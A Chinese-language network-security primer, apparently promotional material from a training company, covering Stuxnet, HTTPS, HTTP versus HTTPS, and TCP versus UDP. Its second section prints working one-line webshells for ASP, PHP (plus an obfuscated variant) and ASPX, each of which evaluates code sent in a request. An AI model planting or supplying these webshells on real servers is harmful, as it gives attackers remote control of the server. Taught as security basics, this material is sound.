1.震網(wǎng)病毒：

　　指一種蠕蟲病毒，是第一個專門定向攻擊真實世界中基礎(能源)設施的“蠕蟲”病毒，比如核電站，水壩，國家電網(wǎng)。只要電腦操作員將被病毒感染的 U 盤插入 USB 接口，這種病毒就會在神不知鬼不覺的情況下(不會有任何其他操作要求或者提示出現(xiàn))取得一些工業(yè)用電腦系統(tǒng)的控制權。

　　與傳統(tǒng)的電腦病毒相比，“震網(wǎng)”病毒不會通過竊取個人隱私信息牟利。無需借助網(wǎng)絡連接進行傳播。這種病毒可以破壞世界各國的化工、發(fā)電和電力傳輸企業(yè)所使用的核心生產控制電腦軟件，并且代替其對工廠其他電腦“發(fā)號施令”。極具毒性和破壞力。“震網(wǎng)”代碼非常精密，主要有兩個功能，一是使伊朗的離心機運行失控，二是掩蓋發(fā)生故障的情況，“謊報軍情”，以“正常運轉”記錄回傳給管理部門，造成決策的誤判。

　　2.一句話木馬　　

asp 一句話木馬：

<%execute(request("value"))%>

php 一句話木馬：<?php@eval($_POST[value]);?>

變形：<?php$x=$_GET[‘z’];@eval(“$x;”);?>

aspx 一句話木馬：

<%@ PageLanguage="Jscript"%>

<%eval(Request.Item["value"])%> 

　　3.Https 的作用

　　內容加密建立一個信息安全通道，來保證數(shù)據(jù)傳輸?shù)陌踩?/p>

　　身份認證確認網(wǎng)站的真實性

　　數(shù)據(jù)完整性防止內容被第三方冒充或者篡改

　　4.HTTPS 和 HTTP 的區(qū)別

　　https 協(xié)議需要到 CA 申請證書。

　　http 是超文本傳輸協(xié)議，信息是明文傳輸;https 則是具有安全性的 ssl 加密傳輸協(xié)議。

　　http 和 https 使用的是完全不同的連接方式，用的端口也不一樣，前者是 80，后者是 443。

　　http 的連接很簡單，是無狀態(tài)的;HTTPS 協(xié)議是由 SSL+HTTP 協(xié)議構建的可進行加密傳輸、身份認證的網(wǎng)絡協(xié)議，比 http 協(xié)議安全。

　　5.TCP 和 UDP 的區(qū)別

　　TCP 協(xié)議和 UDP 協(xié)議特性區(qū)別總結：

　　1.TCP 協(xié)議在傳送數(shù)據(jù)段的時候要給段標號；UDP 協(xié)議不用；

　　2.TCP 協(xié)議可靠；UDP 協(xié)議不可靠；

　　3.TCP 協(xié)議是面向連接；UDP 協(xié)議采用無連接；

　　4.TCP 協(xié)議負載較高，采用虛電路；UDP 采用無連接；

　　5.TCP 協(xié)議的發(fā)送方要確認接收方是否收到數(shù)據(jù)段(3 次握手協(xié)議)；

　　6.TCP 協(xié)議采用窗口技術和流控制當數(shù)據(jù)傳輸?shù)男阅鼙仨氉屛挥跀?shù)據(jù)傳輸?shù)耐暾?、可控制性和可靠性時，TCP協(xié)議是當然的選擇。當強調傳輸性能而不是傳輸?shù)耐暾詴r，如：音頻和多媒體應用，UDP 是最好的選擇。在數(shù)據(jù)傳輸時間很短，以至于此前的連接過程成為整個流量主體的情況下，UDP 也是一個好的選擇，如：DNS 交換。把 SNMP建立在 UDP 上的部分原因是設計者認為當發(fā)生網(wǎng)絡阻塞時，UDP 較低的開銷使其有更好的機會去傳送管理數(shù)據(jù)。

　　TCP 豐富的功能有時會導致不可預料的性能低下，但是我們相信在不遠的將來，TCP 可靠的點對點連接將會用于絕大多數(shù)的網(wǎng)絡應用。

　　以上是網(wǎng)絡安全基礎知識大全第二波，后續(xù)會陸續(xù)進行更新，請關注我們。更多關于網(wǎng)絡安全培訓的問題，歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經驗，采用全程面授高品質、高體驗培養(yǎng)模式，擁有國內一體化教學管理及學員服務，助力更多學員實現(xiàn)高薪夢想。